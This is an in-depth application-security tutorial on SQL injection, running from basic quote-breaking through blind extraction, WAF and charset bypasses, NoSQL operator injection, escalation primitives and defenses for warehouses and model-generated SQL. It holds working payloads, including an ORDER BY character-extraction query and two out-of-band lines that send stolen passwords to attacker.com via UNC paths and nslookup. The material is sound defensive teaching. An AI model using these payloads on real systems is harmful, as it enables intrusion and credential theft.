Application Security

SQL Injection: Beyond Parameterized Queries

In May 2023, a SQL injection flaw in MOVEit Transfer (CVE-2023-34362), a managed file-transfer product sitting inside banks, governments, and payroll processors, was turned by the Cl0p group into one of the largest breaches of the decade, with large-scale downstream impact across a wide swath of organizations and the people whose data they held. The vulnerability class behind it was first publicly documented in 1998. That distance, a quarter century between "we understand this completely" and "it still owns the enterprise," is the whole story of SQL injection. Everyone can recite the one-line fix. Almost nobody applies it in every place it is needed, and the gaps it leaves are where real bugs live. What follows works up from the textbook payload to the techniques that still breach the enterprise, one level at a time.

The PDF is the summary; what follows is the full treatment. Read it top to bottom, or jump to what you came to do:

What SQL injection actually is

SQL injection is usually taught as "the attacker put a quote in your input." That is the symptom. The cause is structural. Your application assembles a statement by concatenating a query template you wrote with data you did not, then hands the database one flat string. The parser then has to recover your intent from bytes, and it cannot, because nothing in that string marks where your trusted structure ends and the attacker's data begins. Code and data travel the same channel. Formally this is CWE-89, and it anchors the A05:2025 Injection category in the OWASP Top 10.

Concatenation merges code and data into one string A query template you wrote and attacker input are glued into a single string, leaving no boundary the parser can use to tell code from data. Query you wrote + Attacker input SELECT ... WHERE email = '' OR '1'='1' --
One flat string reaches the parser, with no boundary between the code you wrote and the data you did not.

Every member of the injection family, OS command, LDAP, XPath, ORM/HQL, template injection, is this same collapse in a different interpreter, and prompt injection (which the closing section returns to) is the same kind of trust-boundary collapse again. The mental shift that pays off: stop hunting "dangerous characters" and treat the bug as two trust domains merged into one string.

Where it hides in real apps

The login form is where SQL injection is taught and almost never where it lives. Injection follows data, and data arrives from far more places than the obvious field. Any value that reaches a query is a candidate, no matter how trustworthy it looks:

The common thread is that none of these feel like attacker input at the point of use. A header looks like infrastructure, an SSO field looks like it came from a trusted provider, a row in your own database looks like your data. The query does not care where the bytes came from; if they were ever attacker-influenced, they still are when they reach the parser. So, no, it is not just login forms.

Level 1 · Basics

The classic case

Everything starts with a value that lands inside a quoted string and an application that builds its query by gluing that value in.

Breaking out of the string

The simplest injectable code concatenates input straight into SQL:

# the value is glued straight into the query text
cur.execute("SELECT * FROM users WHERE email = '" + email + "'")

Send ' OR '1'='1' -- as the email and the logic flips. The leading quote closes the string, OR '1'='1' makes the WHERE clause always true, and -- comments out whatever followed. The query returns every row, which on a login form is an authentication bypass. From the same foothold, UNION SELECT grafts columns from other tables onto the results, and a verbose database error will happily print the data it choked on. And it is not only reads: the same always-true condition dropped into an UPDATE or DELETE rewrites or erases rows in bulk, and a writable injection point can INSERT attacker-chosen data, so injection threatens integrity and availability, not just confidentiality. That is the whole of basic SQL injection: close the quote, rewrite the logic, and read or change data you were never meant to touch.

Parameterize, and don't try to sanitize

For most application code, the first move is to use your ORM or query builder's typed, value-binding APIs, filter(User.email == email), where({ email }), and the like, which bind the values for you. The caveat is that many of the same libraries also expose raw-string overloads, where("email = #{x}") or a raw() escape hatch, that do not bind and reopen the hole, so the rule is to stay on the typed API and treat the raw one as raw SQL. Reach for raw SQL only when you genuinely need it. The rest of this section is what "parameterize" actually means underneath, so that when you do touch raw SQL you know what the safe version is doing.

The fix everyone recites is correct, and the mechanism is the reason it works. The required control is a parameterized API that preserves the separation of code and data: you write the SQL with placeholders and pass the values separately, so the structure you wrote and the values you did not never share the parser's input as one string. The strongest form of that boundary is a server-side bind, the server parses the SQL with placeholders first, freezing the structure, then the values arrive as data on execute, never reaching the parser as code. Not every stack keeps a persistent server-side prepared statement, and that is fine: what matters is that the API preserves code/data separation, not that a prepared statement literally lives on the server. The failure mode to avoid is the other direction, drivers that emulate the bind client-side by interpolating and escaping before they send one string; that is acceptable only when the driver's charset and config are correct, and is best disabled where you can, because emulation drops you back onto escaping and the traps a few sections down.

# the SQL is parsed first; email is bound as a value, never as code
cur.execute("SELECT * FROM users WHERE email = %s", (email,))
Parameterized queries keep code and data on separate tracks The SQL text is parsed first so its structure is fixed; values travel on a separate track and are bound as data at execution, so they can never change the query. QUERY TEXT (CODE) ... WHERE id = ? VALUES (DATA) [id] Execute values bound as data only
Structure is parsed before any value arrives, so a value can never become code.

A common point of confusion: placeholder syntax varies by driver, %s, ?, :name, or $1 depending on the database and library. The %s above is a driver bind marker, not Python % string interpolation and not an f-string, which is precisely why the value never reaches the SQL parser as code.

One thing parameterization is not: authorization. Binding tenant_id, account_id, or user_id makes the value safe from injection, but if the attacker is allowed to choose someone else's ID, you have just safely run an unauthorized query. Access control is a separate check you still owe on top of the bind.

The tempting shortcut is to clean the input by hand instead, strip the quotes and keep concatenating. It does not work, and seeing why is the first real lesson. Stripping apostrophes blocks the textbook payload, which is exactly why it feels safe:

# "sanitized" by deleting quotes, then concatenated anyway
email = user_input.replace("'", "")
cur.execute("SELECT * FROM users WHERE email = '" + email + "'")

But plenty of injection needs no quote at all. The moment the value sits in a numeric or otherwise unquoted position, the apostrophe is irrelevant:

# id is numeric, so there is no quote to break out of
cur.execute("SELECT * FROM accounts WHERE id = " + user_input.replace("'", ""))

# attacker sends:  0 OR 1=1
# query becomes:  SELECT * FROM accounts WHERE id = 0 OR 1=1   (every row)

Sanitizing asks "does this input look dangerous?", a question with infinitely many wrong answers. Parameterization asks nothing about the input at all, which is exactly why it works where hand-cleaning cannot.

Level 2 · Intermediate

No output, no problem

Real targets rarely echo your query back, and they are rarely the database you assumed. The intermediate game is pulling data through narrow channels and fingerprinting the engine so your payloads actually fire.

Extracting data through a keyhole

What an attacker can do depends on what the application hands back. As defenders close the loud channels, attackers move to the quiet ones, so a scanner that only flags the first row below is testing the easiest tenth of the problem.

Reference SQL Injection by Channel How the class is exploited, loudest to most silent.
Channel How it works The tell
Error-based Data leaks through verbose database error messages. DB errors shown to the user
UNION-based UNION SELECT grafts attacker columns onto the result set. Extra or mismatched rows
Boolean blind Nothing is returned, but the response differs on a true/false condition. Same page, content varies by input
Time blind The query pauses on a condition (SLEEP, WAITFOR DELAY). Response latency tracks the payload
Out-of-band The database makes an outbound DNS, HTTP, or SMB request carrying data or credentials. Traffic from the DB to attacker infra

Fingerprinting the engine

The classes above hold everywhere, but the payloads do not. Every engine speaks a different dialect, which is why an attacker fingerprints your database before anything else: a string that works on MySQL is inert on Oracle. Knowing the differences is the line between "I think this is injectable" and a working exploit.

Reference The Same Attack, Four Dialects Why fingerprinting the database comes first.
Technique MySQL PostgreSQL SQL Server Oracle
String concat CONCAT(a,b) a || b a + b a || b
Comment to EOL -- or # -- -- --
Time delay SLEEP(5) pg_sleep(5) WAITFOR DELAY '0:0:5' DBMS_PIPE.RECEIVE_MESSAGE('x', 5)
Stacked queries Off by default Simple protocol only Yes No
Version string @@version version() @@version SELECT banner FROM v$version
Current user current_user() current_user SYSTEM_USER SELECT user FROM dual

The row to watch is stacked queries, the ability to chain a second statement after a semicolon. Where it is allowed, classically SQL Server, an injection jumps from reading data to running INSERT, UPDATE, or system commands. But this is a property of the driver and wire protocol as much as the engine: PostgreSQL permits multiple statements over its simple query protocol yet not the extended (prepared) protocol, so a parameterized call usually cannot stack, and most MySQL drivers disable multi-statements by default. Oracle does not stack at all in ordinary SQL statement contexts, which is why Oracle injection leans on subqueries and out-of-band tricks instead, though an injectable PL/SQL block or dynamic PL/SQL is a different story and can execute several statements. Treat the column as "possible," not "guaranteed," and note the smaller detail that the MySQL -- comment needs a trailing space while # does not. Read these as the canonical form, not a guarantee that each fires anywhere: several depend on a package grant, a driver or protocol setting, or the execution context, Oracle's DBMS_PIPE.RECEIVE_MESSAGE needs EXECUTE on the package, the file and OS primitives further down need their own privileges, and stacking depends on the multi-statement support above, so confirm the precondition before assuming a payload is callable.

SQLite belongs in the conversation even though it is not in the table: it is everywhere modern software hides, desktop and mobile apps, browser extensions, internal tools, and increasingly AI and agent integrations. Its blast radius is smaller, no server, no network, and stacking that depends entirely on the wrapper: prepared execute APIs usually reject a multi-statement string in one call, while exec and script helpers (sqlite3_exec, executescript) will happily run several statements at once. "Smaller" is not "low risk," though: depending on the wrapper and config, injection can still abuse local-file-adjacent features like ATTACH DATABASE, dangerous pragmas, and load_extension where it is enabled. Either way injection against it is real and increasingly common, and the same parameterize-and-allowlist rules apply, plus a few SQLite-specific ones: disable extension loading, consider an authorizer callback (sqlite3_set_authorizer) to veto dangerous operations, and set trusted_schema=OFF where it is relevant.

Cover the gaps parameterization leaves

Parameterization binds values. It cannot bind structure. That single distinction accounts for most of the injection that still turns up in otherwise modern codebases.

  1. Identifiers and syntax

    You cannot bind a table name, a column name, a sort direction, or a keyword. So every dynamic feature, sort by a user-chosen column, choose which columns to return, a configurable table, falls back to concatenation. ORDER BY " + column is the canonical case and it is everywhere. The only safe handling is an allowlist: map the user's input to a fixed, hardcoded set of permitted identifiers and reject anything else. The rule is never accept a raw user-chosen identifier and never rely on escaping alone to make one safe; allowlist first, then quote the trusted identifier the allowlist returns. Identifier-quoting helpers (quote_ident, QUOTENAME, an ORM's identifier escaper) exist for trusted or generated names, schema introspected at startup, not for accepting an arbitrary user-chosen table or column. Quoting is also not authorization: quote_ident only stops a name from breaking the SQL syntax, so a safely-quoted pg_shadow or a secrets table is still the wrong table, returned cleanly. The allowlist closes both holes at once, the broken query and the unauthorized one, because it also decides which names are permitted in the first place. Some dialects do expose identifier-specific APIs, such as Databricks's IDENTIFIER() clause, that accept a parameter marker in a name position; treat that as a convenience, not a loophole, and still feed it only allowlisted, authorization-checked names, since binding a name does not make an arbitrary user-chosen one safe.

    A sortable identifier is also not a minor bug, it is full data extraction. An attacker who controls the ORDER BY expression can read data one character at a time by sorting on a condition, even on an endpoint that never prints the value:

    ORDER BY (CASE WHEN (SELECT substring(password,1,1)
                           FROM users WHERE is_admin LIMIT 1)='a'
                   THEN id ELSE -id END)

    If the rows come back in ascending id order, the first character is a; if the order is reversed, it is not. Walk the positions and the alphabet and the whole secret falls out. The exact syntax is dialect-adjusted in practice, substring, the single-row limit, and the sort expression all vary by engine, but the technique is universal. That is why the control is an allowlist, never escaping and never hoping the column is harmless.

  2. Dynamic IN lists

    WHERE id IN (?) does not expand a list in most drivers, so people concatenate it and reopen the hole. Generate one placeholder per element and bind each value, or use a real array binding where the driver offers one: PostgreSQL's = ANY($1::int[]), SQL Server table-valued parameters, or your ORM's expanding-bind helper. Handle the empty list explicitly, since IN () is a syntax error in most engines, so an empty filter has to short-circuit rather than build a broken or accidentally concatenated query. Be deliberate about what "empty" means, too: "no filter supplied" and "a filter supplied with zero matching IDs" are different intents. For a WHERE id IN (selected_ids) filter, an empty selection should usually become WHERE false and return no rows, not silently drop the clause and widen access to everything. Cap the list length, too: even a safely bound list of thousands of placeholders becomes an availability problem and can hit driver or statement limits, so for large sets reach for a temp table, table-valued parameters, bulk-loaded IDs, or a server-side join instead. The temp-table option is for trusted, application-built queries, not for generated or user-authored SQL, where temporary objects are a side-effect surface to block rather than a tool to reach for (more on that under generated SQL).

    # empty filter must match nothing, not drop the clause
    if not ids:
        return []
    # one placeholder per element, then bind each value
    placeholders = ", ".join(["%s"] * len(ids))
    cur.execute(f"SELECT * FROM orders WHERE id IN ({placeholders})", ids)
    
    # or bind the whole array on PostgreSQL, no placeholder math
    cur.execute("SELECT * FROM orders WHERE id = ANY(%s::int[])", (ids,))
  3. Second-order injection

    Input that was safely parameterized on the way in is still untrusted on the way out. Store x' OR '1'='1 cleanly, then later build a query by concatenating that stored value, and you are injected. Your insert was fine; your read was not. Taint does not expire because data sat in a table.

    # write path is parameterized and fine; name = "x' OR '1'='1"
    cur.execute("INSERT INTO users (name) VALUES (%s)", (name,))
    
    # later, a different path reuses the stored value by concatenation
    row = get_user(uid)
    cur.execute("SELECT * FROM logs WHERE who = '" + row["name"] + "'")   # injected on read
    
    # fix: stored data is still input, so bind it again on the way out
    cur.execute("SELECT * FROM logs WHERE who = %s", (row["name"],))
  4. Stored procedures and ORMs are not magic

    "Use stored procedures" only helps if the procedure uses static or properly parameterized dynamic SQL; a proc that runs EXEC('SELECT ... ' + @input) is just as vulnerable. The fix is the same inside a procedure as outside it, bind the values: sp_executesql with parameters on SQL Server, EXECUTE ... USING in PostgreSQL PL/pgSQL, EXECUTE IMMEDIATE ... USING in Oracle. Where the dynamic part is an object name rather than a value, allowlist it and apply the engine's safe identifier formatting (quote_ident, QUOTENAME, format('%I', ...)); never splice a caller-controlled name in raw. ORMs are safer by default but ship escape hatches that bypass their own protection: string-built Hibernate/JPA HQL, Django .extra() / .raw(), Rails where("... #{x}"), Sequelize literal(), Knex whereRaw, Prisma $queryRawUnsafe (this is an illustrative sample, not the full list, the framework matrix later carries the fuller reference for the stacks covered). Each is a concatenation point in an ORM's clothing, and they cluster in exactly the features, search, reporting, dynamic filters, where identifier binding already failed. There is a second, sharper risk with procedures: their execution context. SQL Server EXECUTE AS, Oracle definer-rights packages, PostgreSQL SECURITY DEFINER, and ownership chaining all let a proc run with privileges the caller does not have, so a vulnerable one becomes privilege escalation even when the app role itself is tightly constrained. A constrained app role does not contain an injectable definer-rights proc; that has to be audited on its own.

    -- vulnerable: dynamic SQL concatenated inside the proc
    EXEC('SELECT * FROM users WHERE name = ''' + @name + '''');
    
    -- safe: parameterize the dynamic SQL
    EXEC sp_executesql
      N'SELECT * FROM users WHERE name = @name',
      N'@name nvarchar(100)', @name = @name;

Here is the allowlist pattern in practice, for the sort case that parameterization can't reach:

SORT = {"date": "created_at", "name": "last_name"}        # fixed allowlist
DIR  = {"asc": "ASC", "desc": "DESC"}                     # direction is allowlisted too

col = SORT.get(request.args.get("sort"))
direction = DIR.get(request.args.get("dir"))
if col is None or direction is None:                      # unknown input is rejected, not defaulted
    raise BadRequest("invalid sort")

query = f"SELECT ... ORDER BY {col} {direction}"          # tokens are not attacker-controlled
Level 3 · Advanced

Defeating the defenses

Now the target has parameterized the easy paths and bolted a WAF in front. Advanced work lives in the layers underneath: the filter, the character set, and the databases that aren't SQL at all.

Beating filters and WAFs

Every blocklist invites a bypass, and SQL's flexibility makes them cheap. Attackers break keywords with inline comments (UN/**/ION, or MySQL's versioned /*!50000UNION*/ that runs only on MySQL), vary case (SeLeCt), swap whitespace for comments or exotic bytes (%09, %0a, /**/, parentheses), and encode the payload one or more layers deep, URL, double-URL, unicode, hex literals like 0x53454c454354, or CHAR()/CHR() concatenation. The logic is just as fluid: OR 1=1 becomes OR 2>1, OR 'a'='a', or &&. None of this is manual labor: sqlmap's --tamper scripts apply these transforms automatically, swapping spaces for inline comments (SELECT/**/password), randomizing case, and URL- or hex-encoding the payload, so a static regex blocklist is bypassed on the first automated pass.

Anything that tries to recognize malicious SQL in a string is playing a game it eventually loses.

The deeper reason WAFs fail is a parser differential. The WAF and the database do not parse SQL the same way: the WAF normalizes input and matches it against its own approximation of the grammar, while the database has the real one. Any construct the two interpret differently, a comment style the WAF strips but the engine honors, an encoding the engine decodes but the WAF does not, a multibyte sequence they disagree on, is a bypass waiting to be found, and that gap never fully closes. The differential is not only in SQL parsing; it starts at request parsing. Duplicate parameters, mixed JSON and form bodies, content-type confusion, proxy normalization, and a framework's parameter-precedence rules can all mean the value the WAF inspected is not the value that reaches the query. If the WAF and the app disagree on which copy of a parameter wins, the inspected one can be harmless while the live one is not.

Encoding and charset tricks

Escaping is not even a fixed operation; whether it neutralizes a quote depends on the character set. (And if your "prepared" statements are actually emulated client-side, common with PHP PDO's ATTR_EMULATE_PREPARES = true on MySQL, you are back on escaping entirely, with everything below in play.)

Multibyte charsets defeat byte-wise escaping. In encodings like GBK, Big5, or Shift-JIS, some lead bytes combine with the following byte to form one character. A charset-naive escaper that inserts 0x5c (\) before a quote can be tricked: send 0xbf 0x27, the escaper produces 0xbf 0x5c 0x27, and because 0xbf5c is a single valid GBK character, the backslash is swallowed as its trailing byte, leaving the 0x27 (') live. UTF-8 is immune to this specific trick, since its continuation bytes never include 0x5c, which is one more reason utf8mb4 should be the default everywhere. It does not make escaping safe in general, though, it just closes this one multibyte hole; parameterization is still the control.

Setting the charset with a query is not enough. mysql_real_escape_string() escapes according to the charset the client library believes is active. Running SET NAMES gbk as a query changes the server's view but not the client's, so the escaper keeps treating input as single-byte and stays vulnerable. The charset has to be set through the API (mysql_set_charset(), mysqli::set_charset(), or a PDO DSN charset=). A great deal of "we escape and we set the charset" code was exploitable for exactly this reason. Set it when the connection is created, not after: a query that escapes input can run before a later charset call, and some drivers will not retroactively update their client-side state.

A character can change after you validate it. Charset conversions are not always faithful. Windows "best-fit" mapping, for one, transcodes certain non-ASCII characters to the nearest ASCII look-alike: a fullwidth or modifier apostrophe that sailed through validation and escaping can be converted into a plain 0x27 quote by a downstream code-page conversion, arriving at the database as a live quote you never inspected.

The NoSQL cousin

The boundary failure is not unique to SQL; it surfaces wherever untrusted input reaches a query interpreter, just with different grammar. MongoDB is the common case. An application that trusts a JSON body and passes it straight into a query lets an attacker substitute operators for values: send {"user":"admin","pass":{"$ne":null}} and the password check becomes "not equal to nothing," which is always true. The sharper edge is the JavaScript sinks, $where, legacy mapReduce, and the aggregation $function, which evaluate server-side JavaScript and turn injection into database-side code execution, running inside the engine's JavaScript environment, rather than just data disclosure. That is not automatically an OS shell, but arbitrary logic running in the database is more than enough to read and tamper at will.

The defenses mirror the SQL ones: pass scalar values into queries rather than raw request objects, validate the shape of anything you do accept and reject unexpected operator keys like $ne or $where, enforce a schema, and avoid the server-side JavaScript operators entirely. Crucially, that validation has to be recursive: checking only the top level misses operators smuggled into nested objects, array elements, dotted keys, or update operators. Validate the whole object shape against a schema and extract scalars explicitly, rather than trusting that a clean first level means a clean payload. And it is not only the filter: the same structural problem reaches update documents, projections, sort objects, and aggregation pipelines, all of which are attacker-shaped objects too. The defensive pattern is not "block $ne," it is to build each of those, the $set document, the projection, the sort, the pipeline stages, from route-specific allowlists, exactly as you allowlist structure in SQL.

// vulnerable: the raw request body becomes the query filter
db.users.findOne(req.body)            // {"user":"admin","pass":{"$ne":null}}

// safe: validate types first and reject non-scalars, so an object or array
// can never slip in as an operator; then query with the checked values
const { user, pass } = req.body;
if (typeof user !== "string" || typeof pass !== "string") {
  throw new Error("user and pass must be strings");
}
db.users.findOne({ user, pass })

Fix it in the configuration

Server modes change the rules of escaping. MySQL's NO_BACKSLASH_ESCAPES makes \ a literal, so quotes must be escaped by doubling instead, and escaping code that assumes backslashes is then wrong. PostgreSQL has the same story with standard_conforming_strings (off in old versions, on by default since 9.1). ANSI_QUOTES turns " into an identifier quote. Escaping correctness is a function of configuration you may not control; parameterization removes the question.

So the advanced defenses are configuration, not cleverness: default to utf8mb4 and set the connection charset through the driver rather than a stray SET NAMES, normalize input to one encoding early (before you validate), prefer real server-side prepares over emulation, and validate types as a fail-safe (an id is a positive integer; a password is a string, not an object). Run the server in strict mode while you are at it: a non-strict MySQL silently truncates an over-length value to fit its column, which is not injection but a classic logic and authentication bypass (a registration that truncates down to collide with an existing admin row), so reject over-length input rather than letting the database quietly reshape it. Add resource limits to cap the cost of an attack you don't block outright. Two kinds matter. Cost limits blunt extraction and denial of service: a per-user or per-role statement timeout, a hard row or output cap on report and search endpoints, and an engine-specific governor (SQL Server Resource Governor, query cancellation, a max execution time) so a single greedy or time-based query cannot run away with the database. Bound memory and temp space as well as time, since an injected query can exhaust sort or hash memory and spill to disk without ever running long: cap temp-file size, set per-query or per-workload memory limits, and cap result and response body size. Transaction limits stop a secondary outage: read-only transactions on read paths, an idle_in_transaction_session_timeout where available, and lock timeouts, so an injected query cannot park itself holding locks. Cap concurrency too, not just individual queries: per-role connection limits and a bounded pool, so injection cannot turn into an availability incident by spawning many slow queries or exhausting the connection pool even when each query has its own timeout. The WAF stays, as detection and a speed bump, never as the control standing between you and a breach.

Level 4 · Full Compromise

From one injection to the whole machine

Everything so far reads or alters data. The top of the ladder is when a single injection becomes the server itself, and when it happens to thousands of servers at once.

From query to shell

The settings that decide blast radius are what turn a SELECT into a foothold. Where multi-statements are allowed, an injection appends its own statement and pivots from read to write. With the right privileges, MySQL's INTO OUTFILE writes a web shell to disk where secure_file_priv permits it (the precondition the next paragraph breaks down), xp_cmdshell on SQL Server runs operating-system commands, and Oracle's UTL_HTTP reaches the network. And when nothing comes back in the response at all, out-of-band channels exfiltrate anyway: the database is coerced into a DNS or HTTP lookup whose hostname carries the stolen data. Out-of-band is not only data-in-DNS, either: on SQL Server and Windows, a coerced UNC path (the xp_dirtree / xp_fileexist family) makes the host reach out over SMB, which can leak or relay the service account's NetNTLM credentials to an attacker-controlled share, turning a blind injection into credential capture. Concretely, the secret becomes part of a hostname the attacker's DNS or SMB server resolves:

-- MySQL on Windows: the stolen value is the hostname; the UNC path forces a lookup
SELECT LOAD_FILE(CONCAT('\\\\', (SELECT password FROM users LIMIT 1), '.attacker.com\\x'));

-- PostgreSQL (needs superuser / pg_execute_server_program): COPY pipes the value to
-- the program's stdin, which reads it and resolves it as a subdomain
COPY (SELECT password FROM users LIMIT 1) TO PROGRAM 'read x; nslookup "$x.attacker.com"';

Both need a privilege the application role has no reason to hold (FILE on MySQL, superuser or pg_execute_server_program on PostgreSQL), which is exactly why least privilege and egress control, below, are what close the channel.

Every one of those is a configuration choice, which is also where it is stopped:

The dangerous dials, by engine

The same capability is a different switch on each engine, and an injection's ceiling is set by which ones are left on. The containment goal is an application role that holds none of them.

Reference Escalation Dials by Engine What turns a query into a foothold, and where to turn it off.
Capability MySQL PostgreSQL SQL Server Oracle
Prepared statements Driver-dependent; for PDO check ATTR_EMULATE_PREPARES Server-side Server-side Server-side
Multi-statements Off unless CLIENT_MULTI_STATEMENTS Simple protocol only Allowed Not allowed
File read / write FILE, secure_file_priv (server); local_infile (client) COPY ... TO/FROM, pg_read_server_files / pg_write_server_files, pg_read_file, pg_ls_dir, large-object import/export BULK INSERT, OLE Automation UTL_FILE directory
OS commands UDF via written library COPY ... PROGRAM (pg_execute_server_program), untrusted PL xp_cmdshell, CLR, OLE DBMS_SCHEDULER, Java
Network / out-of-band LOAD_FILE UNC (Windows) dblink, extensions OPENROWSET, xp_dirtree, xp_fileexist, UNC paths UTL_HTTP, UTL_INADDR (DNS); needs network ACL

The heaviest of these, CREATE EXTENSION on PostgreSQL, UNSAFE CLR assemblies and external script runtimes (the sp_execute_external_script R/Python family) alongside CLR and OLE on SQL Server, Java on Oracle, all require elevated privilege the application role should never hold. The external-script and CLR runtimes are the modern "database to code execution" family worth auditing specifically, not just the famous xp_cmdshell. One caveat on this whole table: it is weighted toward self-managed databases. Managed and cloud offerings often disable many of these OS and file primitives out of the box, which removes the easiest shell paths but not the risk, and it trades them for a cloud-era set: attached IAM and service roles, external tables and federated queries, object-storage import and export, cloud-native extensions and data-lake connectors, and managed network integrations. Those are the modern "query to the data lake or control plane" paths, and data exfiltration, privilege misuse, and access to service credentials all remain firmly in scope. Emulated prepares belong on the list too: a driver that interpolates client-side is back on escaping, with the charset traps from Level 3 in play.

Automated, and at scale

None of this needs a person. sqlmap and tools like it automate the whole path: they probe a parameter with boolean, error, time, UNION, and stacked-query techniques, fingerprint the engine, then enumerate schemas and dump tables with no further input. Where the database and its privileges allow, the same tool reads and writes files and drops to an OS shell. The practical consequence is that "it is buried in an obscure parameter" is not a control. If a scanner can reach the input, the injection will be found, often within minutes of exposure.

Anatomy of a real one: MOVEit

MOVEit shows how short the distance can be between one injection and total compromise. The flaw was a SQL injection in MOVEit Transfer's web tier, reachable before authentication. That alone is serious; what made it catastrophic was how far the pivot reached. Public advisories reported that the attackers used the injection to install the LEMURLOOT web shell (human2.aspx), so the exploit chain ended with a web shell on disk, turning a data-read bug into remote code execution and persistent access, then exfiltrating at scale across thousands of downstream organizations. The chain is a checklist of missed containment: a pre-auth injection point, an application and database path that could reach the filesystem, and nothing stopping the pivot from query to shell.

Defense in depth, in priority order

And instrument for the attack you cannot prevent. Automated injection is noisy in specific ways: bursts of near-identical requests against a single parameter, repeated ORDER BY and column-count probes as a tool feels out the query shape, time-based payloads that make response latency step in clean intervals (pg_sleep, SLEEP, WAITFOR), and queries that your application would never legitimately issue, catalog sweeps of information_schema, pg_catalog, sysobjects, or sqlite_master/sqlite_schema, lone UNION activity, and file or command primitives like COPY, INTO OUTFILE, and xp_cmdshell. Watch for those at the database and the application, not only the WAF, and you catch the campaign while it is still enumerating rather than after it has exfiltrated. Detection is only as useful as the attribution attached to it, though: log the database user, the app or workflow name, the endpoint or job, the source host, the tenant, a request or correlation ID, the deploy version, and a normalized query fingerprint alongside the query. Seeing a suspicious SELECT is far less actionable when you cannot tie it back to the route, tenant, deploy, or caller that produced it.

Where the signal lives differs by engine. These are the first sources to enable and watch, before an incident rather than during one:

Reference Where to Look, by Engine Audit, query-history, and export logs that show who ran what, and where it went.
Engine Audit and query telemetry to enable and watch
PostgreSQL pg_stat_statements, pgaudit, log_statement, and application_name tagged in logs
SQL Server SQL Server Audit, Extended Events, Query Store
MySQL / MariaDB audit log plugin, general query log, slow query log
Oracle Unified Auditing, Fine-Grained Auditing (FGA)
Snowflake QUERY_HISTORY, ACCESS_HISTORY, QUERY_TAG
BigQuery Cloud Audit Logs, INFORMATION_SCHEMA.JOBS
Redshift SYS/STL views, STL_QUERY, STL_UNLOAD_LOG
Databricks query history, Unity Catalog and workspace audit logs

These sources are not equal, so treat the table as a starting point, not a guarantee of coverage. Most must be enabled deliberately (and some are edition- or permission-gated), several omit failed statements or particular query types, and a few log the full SQL text and bound values, which makes the telemetry itself sensitive. So: turn on what you need before an incident, protect and access-control the audit logs, log a normalized query fingerprint rather than raw SQL with values, attach request, tenant, and workflow attribution to every entry, and know each engine's retention and coverage limits so you are not surprised by what was never captured.

Modern query-feature footguns

"Parameterize values; allowlist structure" is the whole rule, but a surprising number of features blur the line between the two, and that blur is where careful teams still slip.

The tell is the same every time: if the user controls a name, an operator, or a pattern's grammar rather than a plain value, binding does not save you. To be precise, the bind still does its job, it stops injection into the SQL parser; what it cannot stop is injection into a secondary grammar riding inside the value, a regex, a JSON path, full-text query syntax, or a filter DSL. That grammar needs its own defense. Constrain it to a set you defined.

Beyond the request: bulk imports, ETL, and cloud warehouses

Most of the channels above are request-driven, but a large share of an application's SQL is built far from any web handler, in code that reads files, moves data in bulk, and runs analytics. Those paths are the ones nobody fuzzes, and they tend to run with broad privileges, which is exactly why they are worth naming on their own.

Bulk, ETL, and import paths

Generated COPY and LOAD DATA statements, CSV-to-SQL loaders, warehouse ingestion jobs, admin import mappers, and background enrichment all tend to build SQL from data they do not control: file contents, column headers, sheet names, or a field mapping the user uploaded. It is second-order injection by construction, the bytes were written earlier, sometimes by a different system, and the unsafe statement is built when they are read back, often by a privileged batch role with file access. The fixes are the ones from Level 1 with a bulk-specific edge: move the row data through the driver's native bulk path rather than building statements out of it, a static COPY FROM STDIN command with the rows streamed and driver-encoded over the copy protocol (not SQL bind parameters), a prepared multi-row insert with bound values, or a real bulk-load API, never a string-built INSERT; treat headers and user-supplied column mappings as untrusted structure that must resolve through an allowlist of real columns, never reflect a spreadsheet header straight into an identifier; and run each import and reporting job under its own least-privileged role rather than the broad account the app already uses.

Cloud warehouses and analytics engines

The cloud data warehouse is the other modern surface, and it changes what injection buys. Snowflake, BigQuery, Redshift, Databricks SQL, and the BI query builders layered on top rarely hand an attacker an OS shell, but injection there converts into a different blast radius: cross-database and cross-dataset reads; external-stage and object-storage abuse (COPY INTO, UNLOAD, or EXPORT DATA to an attacker-controlled or attacker-readable destination the warehouse role or storage integration is permitted to write); misuse of the cloud identity the warehouse runs as (the attached IAM role, service account, or storage integration, which usually reaches far more than the current query); stored-procedure and UDF abuse (JavaScript and Python UDFs, external functions, and EXECUTE IMMEDIATE dynamic SQL); and bulk export of entire tables. BI tools deserve special caution: a report builder that assembles SQL from user-chosen dimensions, filters, and sorts is a dynamic filter DSL at warehouse scale, and the allowlist-the-structure rule applies unchanged. Defend it like any other database plus the cloud-native layers: bind values (major warehouse APIs and drivers support bind variables or parameter markers for values, with driver and statement-context exceptions), allowlist identifiers and dataset, schema, and stage names, scope the warehouse role and its attached cloud identity to least privilege, restrict external stages and network egress, lock down UDF and external-function creation, and enforce row-access policies and column masking so a query that does get through still cannot cross the datasets or columns it was never meant to see. One rule deserves to be explicit: never accept a user-supplied bucket, stage, URI, or export destination. Map a requested destination to a workflow-scoped, preapproved external location or storage integration, so an injected COPY INTO or EXPORT DATA has nowhere to send the data even if it runs.

Generated SQL: when a model writes the query

The hardest case of all is when a model writes the query. The whole statement is structure you did not author, so the footgun is not one feature but the entire SQL surface. The strongest move is to not let the model emit arbitrary SQL at all: have it produce constrained JSON or an intent object that a deterministic query builder compiles into SQL, because validating a narrow internal DSL you defined is far easier than validating arbitrary SQL after the fact.

Where you must accept generated SQL, make the dangerous things impossible rather than discouraged. A read-only role is the floor, not the ceiling: pair it with a read-only transaction and read-only session settings, and revoke temp-object privileges where the engine supports it, so the sandbox cannot write, run DDL, or create temporary objects, which are a sneaky write and side-effect surface even when permanent DDL is already denied.

Then gate the statement, and make that gate dialect-specific and recursive: parse with the target engine's grammar, require exactly one statement, and inspect every subtree. A shallow "is it a SELECT?" check sails right past dangerous function calls, CTEs, subqueries, lateral joins, hidden table references, comments, stacked statements, and vendor-specific syntax. Reject anything the DSL does not explicitly need. The AST check is the primary gate; query-plan inspection of touched tables, functions, and row estimates is a supplemental, engine-specific add-on. Order matters: run the AST and function allowlist before the SQL ever reaches the planner. Planning is not free of consequences, it resolves and discloses object and schema metadata, and on some engines or configurations it can invoke planner-time functions, rewrite rules, or hooks, so handing un-vetted model SQL even to a non-executing plan is not automatically safe. When you do inspect a plan, use a non-executing one, plain EXPLAIN under the sandbox role, never EXPLAIN ANALYZE or anything that actually runs the query.

